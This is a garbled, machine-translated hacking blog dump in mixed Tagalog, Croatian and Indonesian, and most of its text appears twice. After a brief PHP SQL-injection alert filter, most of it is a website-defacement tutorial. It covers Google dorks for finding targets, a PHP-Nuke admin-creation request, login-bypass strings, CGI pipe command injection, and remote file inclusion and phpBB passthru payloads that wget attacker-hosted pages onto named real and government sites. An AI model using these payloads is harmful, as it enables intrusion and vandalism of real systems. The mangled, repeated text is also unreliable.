Kako To Hack Web Stranice
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Kako To Hack Web Stranice as PDF for free.
More details
- Words: 2,892
- Pages: 14
kako to hack web stranice Cable SQLi Posted by ^ ^ the_dhe | ilalim PHP, ibahagi Huwebes Jul 2, 2009 Fuih .. ang mainit na jogja aja .. (pawis streaming ..) hehehehe. : P Dah ilang araw sa halip mas mababa well, kung ano ang g may sakit muli, cuman kecapekan karaniwang gawin ito ngunit ako bablas, mula sa ulo, ang tiyan, lalamunan lahat ng mali .. (sedih_mode = on) .. Dumapo sa ito ay mali, hindi ang mag-post, kundi i-post .. g may idea .. : D Oo .. ngunit okay, aja pengen ibahagi kaunti snippets sekrip .. Ok, marahil mula sa mga kapwa kasamahan may ngayon nasubok ang kanyang website ngalamin pumunta sa pamamagitan ng lakas ang mga tao sa pamamagitan ng pagpasok ng emang pengen (nah lho .. wes mumet kahit ..), pati na rin ang gumawa ng website sebenernta namin ay madaling malaman kung ano ano na subukan ko ang gagawin ng mga tao sa pamamagitan ng pag-access logs raw na ibinigay sa pamamagitan ng aming hosting provider. Ngunit kami gusto mosok n mantengin maglogin CPANEL namin daluyan ng tubig. Oo ako makakakuha ng mas masaya ka makakapag kasalukuyang ulat sa realtime kapag ang mga bagay na mangyayari na tayo ay kahina-hinala ng website.
Kompolnas.go.id GO TO Hell Indonesia ovo je Indonezija internet stranicama koje čine doktrina komunizma u Malacca mornarica Indonezije akteri iza id.wikipedia.org i kompolnas.go.id
Id.wikipedia.org ovo je Indonezija internet stranicama koje čine doktrina komunizma u Malacca mornarica Indonezije akteri iza id.wikipedia.org i kompolnas.go.id kaya .. ba gaimana paraan ... Let's gamitin ang email pasilidad. kaya kapag may magsasalakay sinusubukang yurakan yurakan ang aming website, at pagkatapos namin ay makuha ang ulat ng diretso sa email sa amin. Gini Halimbawa, sa isang website na kami ay sa patch bagay - mga bagay-bagay na amoy sqli. kung ($ _GET [ 'id'] <= 0 | | strlen ($ _GET [ 'id'])> 9) ( $ Oras = petsa ( "Y-m-d H: i: s"); $ Mensahe = "SQL iniksyon napansin MULA: $ _SERVER [REMOTE_ADDR], Website sa bla bla bla sa $ _SERVER [REQUEST_URI] sa $ oras \ n "; $ Subj = "SQL iniksyon Sa Site"; Mula sa $ = "Website Self bitag";
$ Header = "From: $ mula sa"; $ Na = "Imel sa iyo"; @ Mail ($ na, $ subj, $ mensahe, $ header); ) Nah .. kapag may isang taong sumusubok na gumawa ng isang pagsubok na lagpas sa Allah sqli ay magkakaroon ng isang abiso ipasok ang email sa amin, oras at ang url ay na-access at ang kanyang IP (internet IP / IP na ito ay hindi isang lokal na ISP). : D (maliban kung ang function na huwag paganahin ang mail sa pamamagitan ng hosting). Silahkah sa pag-unlad ng kanilang sariling mga paghahanap para sa isang lokal na IP o ang kanyang mga kataga upang gawin itong mas ... ... 2 Comments » SQL iniksyon Patch Posted by ^ ^ the_dhe | ilalim PHP, tadtarin, katiwasayan, ibahagi Lunes Apr 6, 2009 Sa mga nakaraang mga artikulo kong subukan saia pananaliksik sa mga pamamaraan na sumira ng anyo sa isang website na may mga SQL iniksyon. Kaya .. Ano ang paghawak? Ang bawat programmer o developper ko tiyak ay may karapatan sa mga tuntunin ng action laban sa SQL iniksyon ay. Okay .. saia akan kaunti kritika tungkol sa paghawak ng mga simpleng bulong bulong ng aksyon SQL iniksyon. Let's simulan ... hehehehe Karamihan sa mga kaso na natagpuan sa oras ng baon gamit SQL iniksyon pamamaraan ay upang magamit pemfilteran ng ID kaya mahalaga sipp .. bilang isang halimbawa ay ang mga sumusunod: http://www.apasaja.com/news.php?id=-1234 o http://www.opowae.com/news.php?id=1234 ' Nah lho .. bawat magsasalakay sumusubok upang magsingit ng isang karakter na linya o ang minus sign sa balita .. id ang mga simpleng katotohanan kami ay maaaring lumikha ng isang filter na maaari lamang id na mas malaki kaysa sa 0 minus alias lamang at hindi dapat pinapayagan alias integer
numero. Tulad ng mga sumusunod: 0) ( / / Execute Query kayo o ang inyong aplikasyon iba pa () Echo "Hayo ngapaen isang mo ... minus lahat ... ahahaha"; ) ?> ang mga simpleng paraan upang mapigilan ang pagpasok sqlinjection script .. nah, ako na ngayon kung ano ang magsasalakay baguhin ang mga tanong na tulad nito: http://adasaja.com/news.php?id=1234 + AT 1234 =- 1234 -Nah lho ... piye kuwi dampian pack? logically id 1234 ay nanatiling positibo at alias na ay hindi mamarkahan sa isang minus .. Upang hawakan ito maaari naming baguhin ang guest bago sa amin. Kami ay maaaring magdagdag ng mga filter, halimbawa, ang isang gumagamit ay maaari lamang input id o url na ito ay hindi higit sa 9 na mga character, halimbawa, atbp. Kaya bago ang pagpunta sa mga query sa database namin unang suriin ang numero ng kanyang id mula sa url. 9) ( echo "Bilang ng ID sa kanyang mahabang Amat ... ...."; iba pa () / / Execute ang iyong Query ) ) ?> Yup ... ito ay isang simpleng hakbang upang ang unang tugon ng gawain sqlinjection. Mayroon pa rin ng maraming iba pang
mga paraan na maaaring gawin, depende sa pagkamalikhain ng mga kasamahan kapwa .. ^ _ ^ Umaasa ako na mga ilang tips ng tulong, pag-asa ko ay sira na may ...: D Koraci zamrljati Objavljeno 7. listopad 2005 u Hakiranje 23:25 sati Zamrljati php nuke site Idi na stranicu www.google.com zatim upišite => allinurl:. com / nuke / index.php ili allinurl:. org / nuke / index.php. Nah ... .. kalo udah ketemu ciljne korak je sljedeći: 1. www.target.com / nuke / index.php 2. www.target.com / nuke / admin.php => index.php sam promijenio preko ranije u admin.php 3. Unesite bug iza ove stranice prije nego što: ? AddAuthor & op = add_aid = budakbaonk & add_name = Bog = gad add_pwd & & add_email = [email protected] & add_radminsuper = admin = 1 & eCcgVU5JT04gU0VMRUNUIDEvKjox npr.: www.target.com / nuke / admin.php? op = AddAuthor & add_aid = budakbaonk & add_name = Bog = gad add_pwd & & add_email = [email protected] & add_radminsuper = admin = 1 & eCcgVU5JT04gU0VMRUNUIDEvKjox Šta želim da znači site je na stranici admin put nya Ama. Ali bio sam uspješan, onda URL / pregledavanja pojaviti lu www.target.com/nuke/admin.php?op=mod_author 5. Lu tamo, kako bi se prijava, idite & id lozinku lu liniju. JA pa ipak sjećati se? id = budakbaonk => liat yg diatas tadi password = scalawag => liat yg diatas tadi Nah lu skrg udah ulaz u "Administration Menu" stranici. Mislim lu skrg mengusai stranici! On je on je bio Lu Skrg odaberite sliku Handphone (ispod Poruke imati posts)
Stupac naslov => Stupac sadržaj => Stupac isteka => neograničeno kliknite na karticu i kako dodati poruku u nastavku Kalo udah, otvorite URL / pregledavanja web stranice, a zatim upišite novi ciljani prije, npr. www.target.com / ili www.target.com nuke / nuke / index.php Nemam rezultate zamrljati lu pokušate osvježiti postojeću kliknite karticu Pored url iznad / pregledavanja lu ======================================== Zamrljati ASP / IIS s koristenjem osvojiti 98 1. Kliknite na ikonu "My Computer" na vašem računalu. 2. Nađi Icon "Web Folder" To je u My Computer. 3. Icon opet Klick "Dodaj web mapu" i pojavit će se "Tip lokacije za dodavanje". 4. Upišite naziv lokacije ćemo zamrljati / dodavanje datoteka npr. http://www.52down.com. Zatim kliknite Next. 5. Pojavljuju se "Unesite naziv za ovu web-mapu", a zatim kliknite Završi. ako ne postoji "Završi" ili "Error" znači ne može dideface musti pa ćete naći još jedan cilj. 6. Kada uspije, vratite se na web-folder, tamo smo vidjeli http://www.52down.com datoteke. Kliknite na sliku na stranici. 7. Otvorite datoteku "Hacked.html", koju ste upravo sada (da ne moram html datoteku, lu prvi ms.fronpage u HTML datoteke spremaju se u računalu Lu) dalje kopirati, a zatim se vratite se na datoteku http://www.52down.com, I zalijepite datoteku "Test.html" liniju. Ako ne možete zalijepiti u srednji Ja dipath isti adminnya, tako da ćete naći musti drugi cilj. 8. Kada uspije, vidimo rezultate u URL / pregledavanja npr. http://www.52down.com/Test.html 9. Ako želim pronaći ciljati u potrazi nastavlja www.google.com tipa u allinurl:. hr / index.asp ili allinurl:. org / default.asp live kreativnost vam cilj. Ili možete pretražiti ciljati u http://www.zone-h.org/en/defacements/ JA klik na desnoj strani ogledalo (do Windows 2000), Prati njegov target => Defacer: Infektion Group Domena: www.namatarget.com <
Kako omogućiti odaberite hipervezu, odaberite boju pozadine su, odabir boja crna, su ok Vi odaberite karticu centra iznad vas (prosječni srednji) ms.word kayaking, Br.5 odaberite veličinu fonta (18pt), trus odabir boje fonta (ja sliku A), odaberite crvenu boju, volim pisati po sjeckan nadimak za vas, pritisnite "Enter" 3 puta Trus type Admin Hej ... ... .. to vam je potrebna pomoć? Kako upisati, Kako napisati Matrix.Dal.Net - # surabayahack, trus unesete 3 puta Što želim odabrati gornju karticu umetnuti sliku, odaberite slike, trus odaberite datoteku ...., u imenu datoteke tipa jpg datoteku ili http://www.finagro.gov.co/902.gif pretraživanje / gif u pc lu trus ok želim odabir glazbe na gornju karticu formata, trus trus odabir pozadine odaberite karticu opće, u "pozadini zvuk lokaciji" tip http://www.indonesia.go.id/berkibar.mid ili traženje datoteke u midi pc lu Je li to ok nyimpan Utk odaberite datoteku gornju karticu, odaberite Spremi kao ... Naziv datoteke: sjeckan ili nadimak ste ok Napomena: Ako se datoteke imaju lu nyimpan out "Save file embedded" odaberite "set akciju" trus odaberite "dont ste" su ok Pogledajte rezultate za odabir kartice na dnu pregled. ======================================= Zamrljati Guestbook (knjiga gostiju) Korištenjem SQL Injection tehnike, možemo mendeface guestbook (guestbook) obje datoteke php, asp, cfm, CGI, HTML i kawan2. Ja Ingat2 mogu sve dideface guestbook. KORAK 2 I. Pronađite ciljati u knjigu gostiju sa www.google.co.id site: guestbook.php ili moj site: hr bukutamu.php II. Ako ja mogu ciljati njih, kao www.namatarget.my / guestbook.php lu onda što trebate učiniti je ispuniti kolom2 guestbook vam na raspolaganju. Lu mi je potrebno da popunite polja guestbook s izvornom identitetu, jednostavno lažni identitet aja. primjer: Ime: funny lutka Email: [email protected] Web stranica: www.boneka-lucu.com Porijeklo: market lutke Komentar:
Napomena baik2 postojeće komentare u poljima, u dobrom SQL Injection na stranici guestbook, tu ćemo ući slika (slike porno jgn ya? neće biti lho? ntar mama dimarah). Vi kliknite na "submit" dugme ili što Imam svoje ime u knjigu gostiju stranice. Zatim otvorite URL / pregledavate nove trus Vrsta ciljne ranije www.namatarget.my / guestbook.php Ukoliko nema rezultata, pokušajte klikom na tab "Osvježi" na strani url / pregledavanja lu. Nah ... ja se pojaviti DEH sliku prije nego što odemo na guestbook stranicu. Znači da se web stranice mogu dideface guestbook. Napomena: JA dont imati slike, samo ako imate posts znači guestbook stranici mogu dideface. Lu dong jgn razočaran! potraga za drugim ciljati. III. Kako prikazati sliku prije nego što smo unijeli, ponovo otvoriti guesbook stranicu. Da li je sadržaj više dostupna vam kolom2 guestbook. primjer: Ime: zamrljati Email: [email protected] Web stranica: www.deface.com Porijeklo: u virtualnom svijetu komentar: Napomena baik2 postojeće komentare u stupcu s SQL Injection na stranici guestbook, tu ćemo ući u skriptu za nejasnim. Napomena: Lu prije ulaska u skriptu gore ranije, Lu kata2 prvi urediti odgovarajući lu želju. IV. Kliknite na "Submit" gumb, ili ono ime koje ste u guestbook stranicu. Zatim otvorite URL / pregledavanja su novu vrstu target prije www.namatarget.my / guestbook.php Ukoliko nema rezultata, pokušajte klikom na tab "Osvježi" na strani url / lu pregledavanja. Nah ... prikaži DEH zamrljati naše rezultate u guestbook stranicu. ====================================== zamrljati sql injekciju u asp
1. otvoreni pregledavanja / url www.google.co.id 2. Vrsta stranice: go.id login.asp npr. možemo ciljati svojim www.namatarget.com / login.asp 3. upišite korisničko ime i pass' ili '=' 4. otvoriti datoteke jedan po jedan ste tamo 5. JA nađi datoteku možemo promijeniti / zamrljati 6. otvoreni pregledavanja / url trus novi tip primjer svojim ranijim target www.namatarget.com 7. Što rezultata još nije tu, kliknite na karticu uz osvježiti url lu ====================================== zamrljati cgi https: / / bronte.netpresence.com.au / ~ wolfsecu / coartcds / Web_store / web_store.cgi? page = coart_frontpage.html << https: / / bronte.netpresence.com.au / ~ wolfsecu / arai.html ... / Home/sites/site52/users/wolfsecu/web/coartcds/Web_store << allinurl: * *. cgi stranici: .* + html site:. http://www.google.co.id/search?q=allinurl ili nas: *. cgi% 3D% 3Fpage *. html + site:. hr & hl = hr & Lr = & start = 10 & sa = N musti svoj cilj html datoteke diujung Želim ga tambahin | pwd | ======================================= zamrljati cgi II http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id | http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd | http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo "sjeckan by psihofiziološko. Admin Hej ... da li je potrebna pomoć? Matrix.Dal.Net surabayahack "> / usr/home/web/users/a0004481/html/adspro/jh.html |
http://www.sports-media.org/adspro/jh.html http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm <>>>>>> usr/home/web/users/a0004481/html / adspro / cgi-bin / adspro usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< bilješku baik2 usr/home/web/users/a0004481/html/adspro/jh.html <<<<<<<< bilješku baik2 cgi-bin/adspro <<<<<<< uklonjen liat index.html file => http://www.sports-media.org/adspro/cgibin/adspro/dhtml.pl?page=top.htm|whereis% 20index.html | http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo "sjeckan by psihofiziološko. Admin Hej ... da li je potrebna pomoć? Matrix.Dal.Net - surabayahack "> decae.html | & cart_id = 9721374.5730 http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo 20% ====================================== zbrisati s php injekcije http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4 izvorna datoteka modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path = to je bug http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root _path=http://www.geocities.com/sandal_karet/script/arai2.jpg? tako index.php? name = PNphpBB2 & file = index & c = 4 uklonjen kako ubrizgati svojim http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root _path=http://www.geocities.com/sandal_karet/script/arai2.jpg? unix naredbu dikotak ići wget http://geocities.com/nusantarajaya_2004/arai.html kako tvrd to http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html http://www.narnia-chroniken.de <<
http://www.giphted.com/index.php?siteName=pics 2Fom% 2Findex.php% izvorna datoteka http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/scr ipt/arai2.jpg? dikotak idi: pwd tako pics 2Fom% 2Findex.php% uklonjen kako ubrizgati svojim http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/scr ipt/arai2.jpg? dikotak idi: http://www.geocities.com/nusantarajaya_2004/arai.html wget-O / izvoz / home / beangyy / www / arai.html kako tvrd to http://www.giphted.com/arai.html ========================================= zamrljati phpBB / forum http://www.bpmpt.go.id/forum/index.php izvorna datoteka uključuje / db.php? phpbb_root_path = to je bug pa uklonjena index.php http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.c om/sandal_karet/script/ara2.jpg? dikotak idi: pwd Što izlaz "hackiranje" znači dipath Ali sam bio uspješan, to je kao u Lu ... ... apain ========================================== zamrljati phpBB / forum II http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12 izvorna datoteka & =% Istaknuti 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd to je bug kako ubrizgati svojim http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd Imam ga wget 3 načina: 1.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / / geocities.com/nusantarajaya_2004/arai.html ; izg 2.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =%
2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / / geocities.com/nusantarajaya_2004/arai.html -O / var/www/singapore/jh2.htm 3.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & istaknuti =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = lwp-download% 20http: / / geocities.com/nusantarajaya_2004/arai . html; izg uobičajeni način na njenu uspješnu 3. kako tvrd to http://singapore.bluejackings.net/arai.html ========================================= Ja liat FS bez prijave http://www.friendster.com/useropen.php?uid = <<<<<< Idi svojim id broj =========================================== zbrisati s php injekcije III direktno u strijeljajte aja BOS biar ga lama2 www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=h ttp://www.geocities.com/ank_newz/sql.htm? Kolo uspješna kao i obično cmd php sql injekciju Što pristup mapi cmd => nađi / trajna-777-D Što mapu permision zanijeka ga znači da može biti u toj mapi apa2 pronaći mapu imate bilo posts trajna ga uzeti primjer http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm? traži pristup mapi [commndnya iznad] cmd => nađi / trajna-777-D će jesti B / W sabar aja JD === Primjer-trajna == zanijeka naći: / + mnt/drive2/lost naći: Dozvola odbijena pronaći: / proc / TTY / driver: Dozvola odbijena naći: / proc/1/task/1/fd: Dozvola odbijena to znači da nema pristup nađemo druge JA probati TP folder / var / www / Također sam ga GPP imati drugo / Home / httpd / vhosts / hdca.org / httpdocs / downloads => primjer mape možete
cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; [bazu komandom OSnya] [bazu komandom OSnya] => wget, dir, mačka, rm, RV-RF itd skarang smo wget cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; wget http://www.geocities.com/nusantarajaya_2004/arai.html evo idu probati do cmdnya -------------------10:35:01 - Http: / / www.geocities.com/nusantarajaya_2004/arai.html => `Arai.html ' Rješavanje www.geocities.com 66.218.77.68 ... Spajanje na www.geocities.com [66.218.77.68]: 80 ... spojeni. HTTP zahtjev poslan, Čekanje odgovora ... 200 OK Dužina: 6,021 [text / html] 0k ... .. 100% 98,21 kB / s 10:35:02 (98,21 kB / s) - `arai.html 'spremljene [6,021 / 6,021] ------------------to znači da je uspjeh za spremanje jer httpdocs jednostavan način liatnya / Home / httpd / vhosts / hdca.org / httpdocs / downloads => www.hdca.org/downloads/ [datoteku zamrljati lo] Primjerice www.hdca.org / Preuzimanja / arai.html selsai DEH se lako http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/ http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk = http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/ sql.htm?&cmd=id; pwd http://img143.imageshack.us/img143/6782/hacked8lc.jpg http://www.sobatpadi.net/download/ http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.co m/dian_maulani2005/inject.htm?&cmd=id; pwd;% 20 ks-la http://www.infokomputer.com/aktual/aktua
Kompolnas.go.id GO TO Hell Indonesia ovo je Indonezija internet stranicama koje čine doktrina komunizma u Malacca mornarica Indonezije akteri iza id.wikipedia.org i kompolnas.go.id
Id.wikipedia.org ovo je Indonezija internet stranicama koje čine doktrina komunizma u Malacca mornarica Indonezije akteri iza id.wikipedia.org i kompolnas.go.id kaya .. ba gaimana paraan ... Let's gamitin ang email pasilidad. kaya kapag may magsasalakay sinusubukang yurakan yurakan ang aming website, at pagkatapos namin ay makuha ang ulat ng diretso sa email sa amin. Gini Halimbawa, sa isang website na kami ay sa patch bagay - mga bagay-bagay na amoy sqli. kung ($ _GET [ 'id'] <= 0 | | strlen ($ _GET [ 'id'])> 9) ( $ Oras = petsa ( "Y-m-d H: i: s"); $ Mensahe = "SQL iniksyon napansin MULA: $ _SERVER [REMOTE_ADDR], Website sa bla bla bla sa $ _SERVER [REQUEST_URI] sa $ oras \ n "; $ Subj = "SQL iniksyon Sa Site"; Mula sa $ = "Website Self bitag";
$ Header = "From: $ mula sa"; $ Na = "Imel sa iyo"; @ Mail ($ na, $ subj, $ mensahe, $ header); ) Nah .. kapag may isang taong sumusubok na gumawa ng isang pagsubok na lagpas sa Allah sqli ay magkakaroon ng isang abiso ipasok ang email sa amin, oras at ang url ay na-access at ang kanyang IP (internet IP / IP na ito ay hindi isang lokal na ISP). : D (maliban kung ang function na huwag paganahin ang mail sa pamamagitan ng hosting). Silahkah sa pag-unlad ng kanilang sariling mga paghahanap para sa isang lokal na IP o ang kanyang mga kataga upang gawin itong mas ... ... 2 Comments » SQL iniksyon Patch Posted by ^ ^ the_dhe | ilalim PHP, tadtarin, katiwasayan, ibahagi Lunes Apr 6, 2009 Sa mga nakaraang mga artikulo kong subukan saia pananaliksik sa mga pamamaraan na sumira ng anyo sa isang website na may mga SQL iniksyon. Kaya .. Ano ang paghawak? Ang bawat programmer o developper ko tiyak ay may karapatan sa mga tuntunin ng action laban sa SQL iniksyon ay. Okay .. saia akan kaunti kritika tungkol sa paghawak ng mga simpleng bulong bulong ng aksyon SQL iniksyon. Let's simulan ... hehehehe Karamihan sa mga kaso na natagpuan sa oras ng baon gamit SQL iniksyon pamamaraan ay upang magamit pemfilteran ng ID kaya mahalaga sipp .. bilang isang halimbawa ay ang mga sumusunod: http://www.apasaja.com/news.php?id=-1234 o http://www.opowae.com/news.php?id=1234 ' Nah lho .. bawat magsasalakay sumusubok upang magsingit ng isang karakter na linya o ang minus sign sa balita .. id ang mga simpleng katotohanan kami ay maaaring lumikha ng isang filter na maaari lamang id na mas malaki kaysa sa 0 minus alias lamang at hindi dapat pinapayagan alias integer
numero. Tulad ng mga sumusunod: 0) ( / / Execute Query kayo o ang inyong aplikasyon iba pa () Echo "Hayo ngapaen isang mo ... minus lahat ... ahahaha"; ) ?> ang mga simpleng paraan upang mapigilan ang pagpasok sqlinjection script .. nah, ako na ngayon kung ano ang magsasalakay baguhin ang mga tanong na tulad nito: http://adasaja.com/news.php?id=1234 + AT 1234 =- 1234 -Nah lho ... piye kuwi dampian pack? logically id 1234 ay nanatiling positibo at alias na ay hindi mamarkahan sa isang minus .. Upang hawakan ito maaari naming baguhin ang guest bago sa amin. Kami ay maaaring magdagdag ng mga filter, halimbawa, ang isang gumagamit ay maaari lamang input id o url na ito ay hindi higit sa 9 na mga character, halimbawa, atbp. Kaya bago ang pagpunta sa mga query sa database namin unang suriin ang numero ng kanyang id mula sa url. 9) ( echo "Bilang ng ID sa kanyang mahabang Amat ... ...."; iba pa () / / Execute ang iyong Query ) ) ?> Yup ... ito ay isang simpleng hakbang upang ang unang tugon ng gawain sqlinjection. Mayroon pa rin ng maraming iba pang
mga paraan na maaaring gawin, depende sa pagkamalikhain ng mga kasamahan kapwa .. ^ _ ^ Umaasa ako na mga ilang tips ng tulong, pag-asa ko ay sira na may ...: D Koraci zamrljati Objavljeno 7. listopad 2005 u Hakiranje 23:25 sati Zamrljati php nuke site Idi na stranicu www.google.com zatim upišite => allinurl:. com / nuke / index.php ili allinurl:. org / nuke / index.php. Nah ... .. kalo udah ketemu ciljne korak je sljedeći: 1. www.target.com / nuke / index.php 2. www.target.com / nuke / admin.php => index.php sam promijenio preko ranije u admin.php 3. Unesite bug iza ove stranice prije nego što: ? AddAuthor & op = add_aid = budakbaonk & add_name = Bog = gad add_pwd & & add_email = [email protected] & add_radminsuper = admin = 1 & eCcgVU5JT04gU0VMRUNUIDEvKjox npr.: www.target.com / nuke / admin.php? op = AddAuthor & add_aid = budakbaonk & add_name = Bog = gad add_pwd & & add_email = [email protected] & add_radminsuper = admin = 1 & eCcgVU5JT04gU0VMRUNUIDEvKjox Šta želim da znači site je na stranici admin put nya Ama. Ali bio sam uspješan, onda URL / pregledavanja pojaviti lu www.target.com/nuke/admin.php?op=mod_author 5. Lu tamo, kako bi se prijava, idite & id lozinku lu liniju. JA pa ipak sjećati se? id = budakbaonk => liat yg diatas tadi password = scalawag => liat yg diatas tadi Nah lu skrg udah ulaz u "Administration Menu" stranici. Mislim lu skrg mengusai stranici! On je on je bio Lu Skrg odaberite sliku Handphone (ispod Poruke imati posts)
Stupac naslov => Stupac sadržaj => Stupac isteka => neograničeno kliknite na karticu i kako dodati poruku u nastavku Kalo udah, otvorite URL / pregledavanja web stranice, a zatim upišite novi ciljani prije, npr. www.target.com / ili www.target.com nuke / nuke / index.php Nemam rezultate zamrljati lu pokušate osvježiti postojeću kliknite karticu Pored url iznad / pregledavanja lu ======================================== Zamrljati ASP / IIS s koristenjem osvojiti 98 1. Kliknite na ikonu "My Computer" na vašem računalu. 2. Nađi Icon "Web Folder" To je u My Computer. 3. Icon opet Klick "Dodaj web mapu" i pojavit će se "Tip lokacije za dodavanje". 4. Upišite naziv lokacije ćemo zamrljati / dodavanje datoteka npr. http://www.52down.com. Zatim kliknite Next. 5. Pojavljuju se "Unesite naziv za ovu web-mapu", a zatim kliknite Završi. ako ne postoji "Završi" ili "Error" znači ne može dideface musti pa ćete naći još jedan cilj. 6. Kada uspije, vratite se na web-folder, tamo smo vidjeli http://www.52down.com datoteke. Kliknite na sliku na stranici. 7. Otvorite datoteku "Hacked.html", koju ste upravo sada (da ne moram html datoteku, lu prvi ms.fronpage u HTML datoteke spremaju se u računalu Lu) dalje kopirati, a zatim se vratite se na datoteku http://www.52down.com, I zalijepite datoteku "Test.html" liniju. Ako ne možete zalijepiti u srednji Ja dipath isti adminnya, tako da ćete naći musti drugi cilj. 8. Kada uspije, vidimo rezultate u URL / pregledavanja npr. http://www.52down.com/Test.html 9. Ako želim pronaći ciljati u potrazi nastavlja www.google.com tipa u allinurl:. hr / index.asp ili allinurl:. org / default.asp live kreativnost vam cilj. Ili možete pretražiti ciljati u http://www.zone-h.org/en/defacements/ JA klik na desnoj strani ogledalo (do Windows 2000), Prati njegov target => Defacer: Infektion Group Domena: www.namatarget.com <
Kako omogućiti odaberite hipervezu, odaberite boju pozadine su, odabir boja crna, su ok Vi odaberite karticu centra iznad vas (prosječni srednji) ms.word kayaking, Br.5 odaberite veličinu fonta (18pt), trus odabir boje fonta (ja sliku A), odaberite crvenu boju, volim pisati po sjeckan nadimak za vas, pritisnite "Enter" 3 puta Trus type Admin Hej ... ... .. to vam je potrebna pomoć? Kako upisati, Kako napisati Matrix.Dal.Net - # surabayahack, trus unesete 3 puta Što želim odabrati gornju karticu umetnuti sliku, odaberite slike, trus odaberite datoteku ...., u imenu datoteke tipa jpg datoteku ili http://www.finagro.gov.co/902.gif pretraživanje / gif u pc lu trus ok želim odabir glazbe na gornju karticu formata, trus trus odabir pozadine odaberite karticu opće, u "pozadini zvuk lokaciji" tip http://www.indonesia.go.id/berkibar.mid ili traženje datoteke u midi pc lu Je li to ok nyimpan Utk odaberite datoteku gornju karticu, odaberite Spremi kao ... Naziv datoteke: sjeckan ili nadimak ste ok Napomena: Ako se datoteke imaju lu nyimpan out "Save file embedded" odaberite "set akciju" trus odaberite "dont ste" su ok Pogledajte rezultate za odabir kartice na dnu pregled. ======================================= Zamrljati Guestbook (knjiga gostiju) Korištenjem SQL Injection tehnike, možemo mendeface guestbook (guestbook) obje datoteke php, asp, cfm, CGI, HTML i kawan2. Ja Ingat2 mogu sve dideface guestbook. KORAK 2 I. Pronađite ciljati u knjigu gostiju sa www.google.co.id site: guestbook.php ili moj site: hr bukutamu.php II. Ako ja mogu ciljati njih, kao www.namatarget.my / guestbook.php lu onda što trebate učiniti je ispuniti kolom2 guestbook vam na raspolaganju. Lu mi je potrebno da popunite polja guestbook s izvornom identitetu, jednostavno lažni identitet aja. primjer: Ime: funny lutka Email: [email protected] Web stranica: www.boneka-lucu.com Porijeklo: market lutke Komentar:
Napomena baik2 postojeće komentare u poljima, u dobrom SQL Injection na stranici guestbook, tu ćemo ući slika (slike porno jgn ya? neće biti lho? ntar mama dimarah). Vi kliknite na "submit" dugme ili što Imam svoje ime u knjigu gostiju stranice. Zatim otvorite URL / pregledavate nove trus Vrsta ciljne ranije www.namatarget.my / guestbook.php Ukoliko nema rezultata, pokušajte klikom na tab "Osvježi" na strani url / pregledavanja lu. Nah ... ja se pojaviti DEH sliku prije nego što odemo na guestbook stranicu. Znači da se web stranice mogu dideface guestbook. Napomena: JA dont imati slike, samo ako imate posts znači guestbook stranici mogu dideface. Lu dong jgn razočaran! potraga za drugim ciljati. III. Kako prikazati sliku prije nego što smo unijeli, ponovo otvoriti guesbook stranicu. Da li je sadržaj više dostupna vam kolom2 guestbook. primjer: Ime: zamrljati Email: [email protected] Web stranica: www.deface.com Porijeklo: u virtualnom svijetu komentar: Napomena baik2 postojeće komentare u stupcu s SQL Injection na stranici guestbook, tu ćemo ući u skriptu za nejasnim. Napomena: Lu prije ulaska u skriptu gore ranije, Lu kata2 prvi urediti odgovarajući lu želju. IV. Kliknite na "Submit" gumb, ili ono ime koje ste u guestbook stranicu. Zatim otvorite URL / pregledavanja su novu vrstu target prije www.namatarget.my / guestbook.php Ukoliko nema rezultata, pokušajte klikom na tab "Osvježi" na strani url / lu pregledavanja. Nah ... prikaži DEH zamrljati naše rezultate u guestbook stranicu. ====================================== zamrljati sql injekciju u asp
1. otvoreni pregledavanja / url www.google.co.id 2. Vrsta stranice: go.id login.asp npr. možemo ciljati svojim www.namatarget.com / login.asp 3. upišite korisničko ime i pass' ili '=' 4. otvoriti datoteke jedan po jedan ste tamo 5. JA nađi datoteku možemo promijeniti / zamrljati 6. otvoreni pregledavanja / url trus novi tip primjer svojim ranijim target www.namatarget.com 7. Što rezultata još nije tu, kliknite na karticu uz osvježiti url lu ====================================== zamrljati cgi https: / / bronte.netpresence.com.au / ~ wolfsecu / coartcds / Web_store / web_store.cgi? page = coart_frontpage.html <<
